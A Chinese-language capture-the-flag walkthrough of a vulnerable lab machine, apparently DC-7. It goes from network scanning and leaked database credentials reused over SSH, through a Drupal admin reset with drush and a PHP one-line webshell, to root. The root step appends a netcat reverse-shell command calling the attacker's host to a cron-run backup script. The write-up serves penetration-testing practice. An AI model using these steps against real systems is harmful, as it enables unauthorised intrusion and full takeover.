0x00 环境介绍
考点:一句话木马,环境不多说了,接下来是一整个正确的渗透流程。
0x01 信息收集
1)IP收集
arp-scan -l
2)端口扫描
nmap -A -p- 192.168.213.149
3)目录扫描-
dirb 192.168.213.149
0x02 渗透攻击
访问web页面,发现作者留下的提示显示:
大概意思“通过字典暴力破解介乎不可能完成,需要跳出“框架””,这里所指的框架便是作者的Twitter账号,下面发现链接地址,下载源码
获取到账户密码,尝试后确认为ssh连接账号
<?php
$servername = "localhost";
$username = "dc7user";
$password = "MdR3xOgB7#dW";
$dbname = "Staff";
$conn = mysqli_connect($servername, $username, $password, $dbname);
?>
登录ssh
发现突破口
drush为该网站的网站管理指令,可以通过该命令给网站后台添加一个用户名和密码
该命令必须在指定网站目录下使用,kali不具备该命令
drush user-password admin --password=123
登录后台,发现命令注入漏洞,
思路:通过创建文章写入一句话木马
添加php插件,便于写入php一句话木马
选用插件
linux安装蚁剑
写入木马
shell连接
0x03 权限提升
靶机~下mbox查看到提示邮件,该邮件15分钟执行一次
将nc root连接写入脚本,等待十五分钟执行,kali先准备接受
注意:注意shell里面不是编程,不需要双引号
kali:1.nc -lvvp 6666
靶机: 2.echo nc 192.168.213.129 6666 -e /bin/bash >> /opt/scripts/backups.sh
稍微等待,反弹成功,获取root权限,交互命令,查看flag
完整思路完成!